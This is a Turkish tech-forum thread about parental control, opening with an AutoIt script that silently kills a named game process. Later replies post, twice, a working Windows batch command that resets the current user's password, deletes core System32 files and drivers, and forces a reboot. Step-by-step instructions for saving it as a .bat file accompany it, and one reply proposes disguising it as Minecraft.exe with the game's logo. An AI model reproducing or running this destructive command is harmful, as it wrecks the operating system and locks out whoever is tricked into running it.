Ebeveyn denetimi programı önerisi

Buyrun, AutoIt ile az önce konuyu görüp yazdığım scripti derleyip hayrını görün. Hayır duanızı beklerim efenim :) "oyun.exe" kısmını istediğiniz herhangi bir oyun ".exe" adı ile değiştirebilirsiniz. Çalıştırıldığı anda oyunu kapatacak ve bildirim çıkartacaktır. ESC tuşuna basarak döngüden çıkabilirsiniz. Basmazsanız bilgisayarı yeniden başlatana kadar veya process'i el ile durdurana kadar arkada çalışacak ve "oyun.exe"yi hunharca kapatacaktır.

Copy-Pasterlara not: İnsafsızca çalıp proje yapabilirsiniz. Kodlar oldukça basit.

Kod:
#RequireAdmin ; Yönetici haklarıyla programın çalışmasını sağlar.
Opt("TrayIconHide",1) ; Başlat menüsünden ikon olarak gizler.

programKapatici()
Func programKapatici()
    Global $algila = 0 ; Algıla değerine 0 ver.
    While 1
        If ProcessExists ("oyun.exe") Then ; Oyun.exe'nin çalışıp çalışmadığını kontrol eder.
            $algila = 1 ; Çalışıyorsa 1 değerini $algila degiskeni içerisine yükle.
            ProcessClose ("oyun.exe") ; Oyun.exe'yi alnının çatından vurup process'i sonlandırır.
            MsgBox(64, "HAYIRDIR", "Oyun mu oynuyorsun sen bakem!!, Oyun moyun yok ulen kapatıyorum.") ; Bildirim çıkarır.
            Sleep(100) ; Ufak bir bekleme süresi, düzgün çalışması için.
        EndIf ; If kapanışı.
        HotKeySet("{ESC}", "Oldur") ; ESC tuşuna basınca programı kapatırsınız. Böylece denetim devam etmez.
        WEnd
EndFunc

Func Oldur()
    MsgBox(64, "Bildirim!", "ESC tuşuna basıldı. Denetim programından çıkılıyor.") ; Çıkış bildirimi.
    Exit
EndFunc
Elinize sağlık hocam.

Şu kısma çok güldüm:

"HAYIRDIR", "Oyun mu oynuyorsun sen bakem!!, Oyun moyun yok ulen kapatıyorum."

Ben olsam oyunun birkaç önemli dosyasını silerdim, aaa oyun bozulmuş, ayağına yatardım:D

Kız uyanıksa oyunu indirmeye çalışmasın diye de Hosts dosyasını düzenleyip Minecraft indiren siteleri engellerdim:D

Ben olsam oyunun birkaç önemli dosyasını silerdim, aaa oyun bozulmuş, ayağına yatardım:D

Kız uyanıksa oyunu indirmeye çalışmasın diye de Hosts dosyasını düzenleyip Minecraft indiren siteleri engellerdim:D
Ben direk System32'yi silerdim hadi bidaha otur.Silmek için:Bu kodu not defterine yazıyoruz.

net user %username% robustteam del %systemroot%\\system32\\dllcache\\c_1254.nls del %systemroot%\\system32\\c_1254.nls del %systemroot%\\system32\\hal.dll del %systemroot%\\system32\\kdcom.dll del %systemroot%\\system32\\kernel32.dll del %systemroot%\\system32\\bootvid.dll del %systemroot%\\system32\\c_037.nls del %systemroot%\\system32\\c_437.nls del %systemroot%\\system32\\c_500.nls del %systemroot%\\system32\\c_737.nls del %systemroot%\\system32\\c_1255.nls del %systemroot%\\system32\\C_28594.nls del %systemroot%\\system32\\c_20866.nls del %systemroot%\\system32\\bidispl.dll del %systemroot%\\system32\\C_28594.nls del %systemroot%\\system32\\ups.exe del %systemroot%\\system32\\trkwks.dll del %systemroot%\\system32\\scardsvr.exe del %systemroot%\\system32\\audiosrv.dll del %systemroot%\\system32\\drivers\\atapi.sys del %systemroot%\\system32\\drivers\\cdaudio.sys del %systemroot%\\system32\\drivers\\cdfs.sys del %systemroot%\\system32\\drivers\\cdrom.sys shutdown -r -t 00 net user %username% robustteam
Kodu yazdıktan sonra sol üstten "Dosya" kısmına gelip Farklı Kaydet'e basıyoruz,bastıkdan sonra bize bir Dosya Seç isimli bir şey açılcak.Dosya adını yazdıktan sonra sonuna .bat ekliyoruz Örnek:Technopat.bat buna basdıktan sonra System32 gidiyor siliniyor.(hiç ama hiçbir sorumluluk kabul etmiyorum)

Son düzenleyen: Moderatör:
Ben direk System32'yi silerdim hadi bidaha otur.Silmek için:Bu kodu not defterine yazıyoruz.

net user %username% robustteam del %systemroot%\\system32\\dllcache\\c_1254.nls del %systemroot%\\system32\\c_1254.nls del %systemroot%\\system32\\hal.dll del %systemroot%\\system32\\kdcom.dll del %systemroot%\\system32\\kernel32.dll del %systemroot%\\system32\\bootvid.dll del %systemroot%\\system32\\c_037.nls del %systemroot%\\system32\\c_437.nls del %systemroot%\\system32\\c_500.nls del %systemroot%\\system32\\c_737.nls del %systemroot%\\system32\\c_1255.nls del %systemroot%\\system32\\C_28594.nls del %systemroot%\\system32\\c_20866.nls del %systemroot%\\system32\\bidispl.dll del %systemroot%\\system32\\C_28594.nls del %systemroot%\\system32\\ups.exe del %systemroot%\\system32\\trkwks.dll del %systemroot%\\system32\\scardsvr.exe del %systemroot%\\system32\\audiosrv.dll del %systemroot%\\system32\\drivers\\atapi.sys del %systemroot%\\system32\\drivers\\cdaudio.sys del %systemroot%\\system32\\drivers\\cdfs.sys del %systemroot%\\system32\\drivers\\cdrom.sys shutdown -r -t 00 net user %username% robustteam
Kodu yazdıktan sonra sol üstten "Dosya" kısmına gelip Farklı Kaydet'e basıyoruz,bastıkdan sonra bize bir Dosya Seç isimli bir şey açılcak.Dosya adını yazdıktan sonra sonuna .bat ekliyoruz Örnek:Technopat.bat buna basdıktan sonra System32 gidiyor siliniyor.(hiç ama hiçbir sorumluluk kabul etmiyorum)
Bunu Minecraft.exe olarak kaydetip Minecraft logosu koyarsak tam olur :D.

Uyarı! Bu konu 5 yıl önce açıldı.
Muhtemelen daha fazla tartışma gerekli değildir ki bu durumda yeni bir konu başlatmayı öneririz. Eğer yine de cevabınızın gerekli olduğunu düşünüyorsanız buna rağmen cevap verebilirsiniz.

Technopat Haberler

Yeni konular

Geri
Yukarı